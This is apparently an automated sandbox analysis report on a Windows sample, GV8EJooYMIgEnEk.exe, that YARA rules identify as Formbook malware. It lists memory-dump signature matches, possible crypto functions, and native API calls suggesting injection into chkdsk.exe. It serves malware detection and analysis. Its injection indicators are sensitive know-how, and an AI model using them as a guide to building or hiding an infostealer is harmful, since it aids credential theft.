Source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Uses 32bit PE files
Source: GV8EJooYMIgEnEk.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Yara signature match
Source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.GV8EJooYMIgEnEk.exe.28fd388.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
Source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.GV8EJooYMIgEnEk.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.GV8EJooYMIgEnEk.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.GV8EJooYMIgEnEk.exe.2979c1c.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
Source: 0.2.GV8EJooYMIgEnEk.exe.3a0a690.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.GV8EJooYMIgEnEk.exe.3a0a690.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.GV8EJooYMIgEnEk.exe.3a64cb0.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.GV8EJooYMIgEnEk.exe.3a64cb0.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Detected potential crypto function
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 0_2_0275E6D8 0_2_0275E6D8
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 0_2_0275C294 0_2_0275C294
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 0_2_0275E6C8 0_2_0275E6C8
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 0_2_07160234 0_2_07160234
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 0_2_071692D0 0_2_071692D0
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 0_2_0716003F 0_2_0716003F
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 0_2_07160040 0_2_07160040
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 3_2_00401030 3_2_00401030
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 3_2_0041B8C3 3_2_0041B8C3
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 3_2_0041C0CD 3_2_0041C0CD
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 3_2_0041C8EE 3_2_0041C8EE
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 3_2_0041C8F8 3_2_0041C8F8
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 3_2_00408C7F 3_2_00408C7F
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 3_2_0041C435 3_2_0041C435
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 3_2_00408C80 3_2_00408C80
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 3_2_00402D90 3_2_00402D90
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 3_2_0041CF03 3_2_0041CF03
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 3_2_00402FB0 3_2_00402FB0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E4D466 10_2_04E4D466
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D9841F 10_2_04D9841F
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E525DD 10_2_04E525DD
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D9D5E0 10_2_04D9D5E0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB2581 10_2_04DB2581
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E51D55 10_2_04E51D55
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E52D07 10_2_04E52D07
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D80D20 10_2_04D80D20
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E52EF7 10_2_04E52EF7
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DA6E30 10_2_04DA6E30
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E4D616 10_2_04E4D616
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E51FF1 10_2_04E51FF1
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E528EC 10_2_04E528EC
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D9B090 10_2_04D9B090
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E520A8 10_2_04E520A8
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB20A0 10_2_04DB20A0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E41002 10_2_04E41002
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D8F900 10_2_04D8F900
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DA4120 10_2_04DA4120
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E522AE 10_2_04E522AE
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E4DBD2 10_2_04E4DBD2
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DBEBB0 10_2_04DBEBB0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E52B28 10_2_04E52B28
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04A98C80 10_2_04A98C80
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04A98C7F 10_2_04A98C7F
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04A92D90 10_2_04A92D90
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04A92FB0 10_2_04A92FB0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04AACF03 10_2_04AACF03
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04AAC8EE 10_2_04AAC8EE
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04AAC8F8 10_2_04AAC8F8
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: String function: 04D8B150 appears 35 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 3_2_004185E0 NtCreateFile, 3_2_004185E0
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 3_2_00418690 NtReadFile, 3_2_00418690
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 3_2_00418710 NtClose, 3_2_00418710
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 3_2_004187C0 NtAllocateVirtualMemory, 3_2_004187C0
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 3_2_004185DA NtCreateFile, 3_2_004185DA
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 3_2_0041870C NtClose, 3_2_0041870C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC95D0 NtClose,LdrInitializeThunk, 10_2_04DC95D0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC9540 NtReadFile,LdrInitializeThunk, 10_2_04DC9540
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC96D0 NtCreateKey,LdrInitializeThunk, 10_2_04DC96D0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC96E0 NtFreeVirtualMemory,LdrInitializeThunk, 10_2_04DC96E0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC9650 NtQueryValueKey,LdrInitializeThunk, 10_2_04DC9650
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC9660 NtAllocateVirtualMemory,LdrInitializeThunk, 10_2_04DC9660
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC9FE0 NtCreateMutant,LdrInitializeThunk, 10_2_04DC9FE0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC9780 NtMapViewOfSection,LdrInitializeThunk, 10_2_04DC9780
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC9710 NtQueryInformationToken,LdrInitializeThunk, 10_2_04DC9710
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC9840 NtDelayExecution,LdrInitializeThunk, 10_2_04DC9840
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC9860 NtQuerySystemInformation,LdrInitializeThunk, 10_2_04DC9860
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC99A0 NtCreateSection,LdrInitializeThunk, 10_2_04DC99A0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 10_2_04DC9910
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC9A50 NtCreateFile,LdrInitializeThunk, 10_2_04DC9A50
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC95F0 NtQueryInformationFile, 10_2_04DC95F0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC9560 NtWriteFile, 10_2_04DC9560
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DCAD30 NtSetContextThread, 10_2_04DCAD30
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC9520 NtWaitForSingleObject, 10_2_04DC9520
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC9670 NtQueryInformationProcess, 10_2_04DC9670
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC9610 NtEnumerateValueKey, 10_2_04DC9610
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC97A0 NtUnmapViewOfSection, 10_2_04DC97A0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DCA770 NtOpenThread, 10_2_04DCA770
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC9770 NtSetInformationFile, 10_2_04DC9770
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC9760 NtOpenProcess, 10_2_04DC9760
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DCA710 NtOpenProcessToken, 10_2_04DCA710
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC9730 NtQueryVirtualMemory, 10_2_04DC9730
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC98F0 NtReadVirtualMemory, 10_2_04DC98F0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC98A0 NtWriteVirtualMemory, 10_2_04DC98A0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DCB040 NtSuspendThread, 10_2_04DCB040
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC9820 NtEnumerateKey, 10_2_04DC9820
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC99D0 NtCreateProcessEx, 10_2_04DC99D0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC9950 NtQueueApcThread, 10_2_04DC9950
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC9A80 NtOpenDirectoryObject, 10_2_04DC9A80
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC9A10 NtQuerySection, 10_2_04DC9A10
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC9A00 NtProtectVirtualMemory, 10_2_04DC9A00
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC9A20 NtResumeThread, 10_2_04DC9A20
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DCA3B0 NtGetContextThread, 10_2_04DCA3B0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC9B00 NtSetValueKey, 10_2_04DC9B00
